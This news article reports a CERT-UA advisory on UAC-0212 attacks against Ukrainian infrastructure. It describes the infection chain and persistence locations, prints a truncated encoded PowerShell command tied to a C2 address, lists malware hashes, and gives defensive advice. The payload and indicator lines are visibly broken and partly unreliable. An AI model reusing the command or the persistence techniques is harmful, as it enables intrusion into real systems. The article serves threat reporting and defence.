A sophisticated threat cluster tracked as UAC-0212 has escalated efforts to compromise critical infrastructure systems in Ukraine, according to a recent advisory from CERT-UA (Government Computer Emergency Response Team of Ukraine).
These attacks, active since July 2024, focus on energy, water supply, grain logistics, and transportation sectors through coordinated supply-chain compromises.
The group employs destructive payloads, advanced persistence mechanisms, and novel evasion techniques to disrupt industrial control systems (ICS) and operational technology (OT).
UAC-0212 operates as a subcluster of the notorious UAC-0002 (Sandworm/APT44) group, blending traditional cyberespionage with destructive objectives.
Initial infection vectors involve phishing emails containing weaponized PDF documents. These PDFs disguise malicious LNK files (CV_Vitaliy_Klymenko_22.11.2024.pdf.lnk) that exploit CVE-2024-382, a critical Windows vulnerability enabling arbitrary PowerShell command execution.
Computer Emergency Response Team of Ukraine noted that upon activation, these files download decoy documents while deploying modular malware such as SECONDBEST, EMPIREPAST, and SPARK in the background.
The attackers leverage legitimate network protocols like RSYNC (C:\Windows\Microsoft\Rsync\rsync.exe) for lateral movement and data exfiltration.
Persistent footholds are established through registry modifications (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemZ_611) and startup scripts (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\updater.vbs).
The infection chain begins with a malicious PDF containing obfuscated PowerShell commands. For instance, the following snippet employs XOR-based payload decryption and connects to 62.113.238.72 for command-and-control (C2):-
powershell JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGUAbQB1AG4AZABlAG4AZwBlAHIAZABh... [truncated] JABTAHQAcgBpAG4AZwBSAGEAbgBkAG8AbQBGAG8AbABkAGUAcgAgAD0AIABHAGUAdAAtAFIAYQBuA... [truncated]
Key payloads include:-
9bdf252eec4cf8a32cd92be3568e6187e80a80ecc5c528439312fb263cda8905).ssowoface.dll, SHA256: 1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a) mimicking legitimate software updates.Infrastructure targeting includes Ukrainian logistics firms specializing in hazardous material transport and grain storage systems. The attackers exfiltrate engineering schematics and ICS credentials to facilitate downstream attacks.
CERT-UA urges critical infrastructure operators to audit suspicious registry entries, monitor RSYNC traffic, and block the following IOCs:-
1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a (EMPIREPAST), bf3b92423ec8109b38cc4b27795624b65665a1f3a6a18dab29613d4415b4aa18 (SPARK).Organizations are advised to prioritize network segmentation and enforce application allowlisting for PowerShell.
As UAC-0212 reuses compromised credentials for lateral movement, CERT-UA recommends rotating all administrative passwords and deploying endpoint detection for anomalous LNK file activity.
The agency warns that mere “antivirus scans” or OS reinstalls are insufficient, as attackers rapidly establish backup persistence mechanisms.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here
Microsoft has pushed out an emergency, out-of-band Windows 11 update after its September Patch Tuesday…
CDR is the runtime, real-time half of cloud security: while CSPM tells you what’s misconfigured,…
Your SaaS estate M365, Salesforce, Workday, Slack, hundreds of others is a sprawl of misconfigurations,…
DSPM finds sensitive data you didn’t know you had, classifies it, maps who can reach…
Open-source packages are meant to save developers time. In the GemStuffer campaign, that trust became…
Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…